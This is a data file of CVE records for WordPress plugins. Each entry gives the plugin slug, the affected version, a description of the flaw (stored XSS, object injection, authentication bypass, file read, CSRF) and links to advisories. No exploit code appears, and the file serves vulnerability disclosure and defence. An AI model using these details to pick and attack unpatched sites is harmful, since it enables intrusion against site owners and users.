{"CVE_ID":"CVE-2023-3996","slug":"armember-membership","versionImpact":"4.0.14","description":"The ARMember Lite - Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 4.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.armemberplugin.com\",\"name\":\"https:\\\/\\\/www.armemberplugin.com\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905086%40armember-membership%2Ftrunk&old=2885708%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905086%40armember-membership%2Ftrunk&old=2885708%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.md\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.md\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1022ac4-869e-415a-a7c8-3650421608ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1022ac4-869e-415a-a7c8-3650421608ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/armember-membership\\\/tags\\\/4.0.2\\\/readme.txt\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1731","slug":"auto-refresh-single-page","versionImpact":"1.1","description":"The Auto Refresh Single Page plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1 via deserialization of untrusted input from the arsp_options post meta option. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8f8d46-d7e7-4b07-9b10-15e579973474?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-refresh-single-page\\\/trunk\\\/auto-refresh-single-page.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-refresh-single-page\\\/trunk\\\/auto-refresh-single-page.php#L42\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0966","slug":"shariff","versionImpact":"4.6.9","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes like 'info_text'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks the information icon.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/services\\\/shariff-info.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/trunk\\\/services\\\/shariff-info.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5504","slug":"rife-elementor-extensions","versionImpact":"1.2.1","description":"The Rife Elementor Extensions & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute within the plugin's Writing Effect Headline widget in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bc0b654-5174-41bc-9e8a-40257ceb7ded?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bc0b654-5174-41bc-9e8a-40257ceb7ded?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rife-elementor-extensions\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/writing-effect-headline.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rife-elementor-extensions\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/writing-effect-headline.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109903\\\/#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109903\\\/#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7629","slug":"responsive-video","versionImpact":"1.0","description":"The Responsive video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's video settings function in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires responsive videos to be enabled for posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c530f5d2-eed3-433b-bf96-656593ad6ce2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c530f5d2-eed3-433b-bf96-656593ad6ce2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-video\\\/trunk\\\/responsive-video.php#L534\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-video\\\/trunk\\\/responsive-video.php#L534\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8850","slug":"mailchimp-for-wp","versionImpact":"4.9.16","description":"The MC4WP: Mailchimp for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email' parameter when a placeholder such as {email} is used for the field in versions 4.9.9 to 4.9.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d2ba8ea-a75f-4069-b67d-f832acb1deef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d2ba8ea-a75f-4069-b67d-f832acb1deef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/tags\\\/4.9.16\\\/config\\\/default-form-content.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/tags\\\/4.9.16\\\/config\\\/default-form-content.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153075%40mailchimp-for-wp&new=3153075%40mailchimp-for-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153075%40mailchimp-for-wp&new=3153075%40mailchimp-for-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9989","slug":"crypto","versionImpact":"2.15","description":"The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to a limited arbitrary method call to 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L138\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50541","slug":"advanced-control-manager","versionImpact":"2.16.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Enea Overclokk Advanced Control Manager for WordPress by ItalyStrap allows Stored XSS. This issue affects Advanced Control Manager for WordPress by ItalyStrap: from n\/a through 2.16.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-control-manager\\\/wordpress-advanced-control-manager-plugin-2-16-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-control-manager\\\/wordpress-advanced-control-manager-plugin-2-16-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13495","slug":"gamipress","versionImpact":"7.2.1","description":"The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via the gamipress_ajax_get_logs() function in all versions up to, and including, 7.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55fa8423-9a41-4afe-9401-03d232caa656?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55fa8423-9a41-4afe-9401-03d232caa656?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13115","slug":"wp-projects-portfolio","versionImpact":"3.0","description":"The WP Projects Portfolio with Client Testimonials WordPress plugin through 3.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e46727-3995-4442-bbcb-04e793d72108\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e46727-3995-4442-bbcb-04e793d72108\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5239","slug":"domain-for-sale","versionImpact":"3.0.10","description":"The Domain For Sale plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class_name\u2019 parameter in all versions up to, and including, 3.0.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/domain-for-sale\\\/trunk\\\/src\\\/Admin\\\/GutenbergBlock\\\/Gutenberg_Block_Init.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/domain-for-sale\\\/trunk\\\/src\\\/Admin\\\/GutenbergBlock\\\/Gutenberg_Block_Init.php#L278\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306141\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306141\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/domain-for-sale\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/domain-for-sale\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb4cb5e-38ea-430e-b6ae-3712b3607a25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb4cb5e-38ea-430e-b6ae-3712b3607a25?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8462","slug":"rt-easy-builder-advanced-addons-for-elementor","versionImpact":"2.3","description":"The RT Easy Builder \u2013 Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the social URL parameter in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rt-easy-builder-advanced-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rt-easy-builder-advanced-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb02fd7-1090-4139-ae0e-977fdec5da7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb02fd7-1090-4139-ae0e-977fdec5da7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0422","slug":"article-directory","versionImpact":"1.3","description":"The Article Directory WordPress plugin through 1.3 does not properly sanitize the `publish_terms_text` setting before displaying it in the administration panel, which may enable administrators to conduct Stored XSS attacks in multisite contexts.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d57f2fb2-5251-4069-8c9a-a4af269c5e62\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d57f2fb2-5251-4069-8c9a-a4af269c5e62\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3407","slug":"subscribe2","versionImpact":"10.40","description":"The Subscribe2 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 10.40. This is due to missing or incorrect nonce validation when sending test emails. This makes it possible for unauthenticated attackers to send test emails with custom content to users on sites running a vulnerable version of this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92b4d800-2895-4f7b-8b3b-ee6df75a7908?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92b4d800-2895-4f7b-8b3b-ee6df75a7908?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4782","slug":"clickfunnels","versionImpact":"3.1.1","description":"The ClickFunnels WordPress plugin through 3.1.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a0468a-8405-4b6c-800f-abd5ce5387b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3a0468a-8405-4b6c-800f-abd5ce5387b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5128","slug":"tcd-google-maps","versionImpact":"1.8","description":"The TCD Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'map' shortcode in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f6d0aa-059d-48d9-873b-6404f288f002?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f6d0aa-059d-48d9-873b-6404f288f002?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcd-google-maps\\\/trunk\\\/design-plus-google-maps.php?rev=2700917#L169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1478","slug":"hkdev-maintenance-mode","versionImpact":"2.5.0","description":"The Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.0 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content via API thus bypassing the content protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hkdev-maintenance-mode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hkdev-maintenance-mode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6500","slug":"shariff","versionImpact":"4.6.9","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes such as 'secondarycolor' and 'maincolor'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cac2a45e-f09e-4639-9a45-68d528a5094e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cac2a45e-f09e-4639-9a45-68d528a5094e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7390","slug":"wp-testimonial-widget","versionImpact":"3.0","description":"The WP Testimonial Widget plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnSaveTestimonailOrder function in all versions up to, and including, 3.0. This makes it possible for unauthenticated attackers to change the order of testimonials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eef869-a57f-40b5-b289-9353bf5b680a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eef869-a57f-40b5-b289-9353bf5b680a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-testimonial-widget\\\/trunk\\\/functions.php#L358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-testimonial-widget\\\/trunk\\\/functions.php#L358\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8364","slug":"wp-custom-fields-search","versionImpact":"1.2.35","description":"The WP Custom Fields Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcfs-preset shortcode in all versions up to, and including, 1.2.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef36a2a1-b3be-4270-8890-76705817b4b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef36a2a1-b3be-4270-8890-76705817b4b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-fields-search\\\/trunk\\\/plugin.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-fields-search\\\/trunk\\\/plugin.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-custom-fields-search\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-custom-fields-search\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9507","slug":"bit-form","versionImpact":"2.15.2","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.15.2 due to improper input validation within the iconUpload function. This makes it possible for authenticated attackers, with Administrator-level access and above, to leverage a PHP filter chain attack and read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa46842f-ed07-4f72-aedb-aa27baecd79c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa46842f-ed07-4f72-aedb-aa27baecd79c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L1210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L1210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9988","slug":"crypto","versionImpact":"2.15","description":"The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to missing validation on the user being supplied in the 'crypto_connect_ajax_process::register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L91\",\"refsource\":\"\",\"tags\":[]}]"}
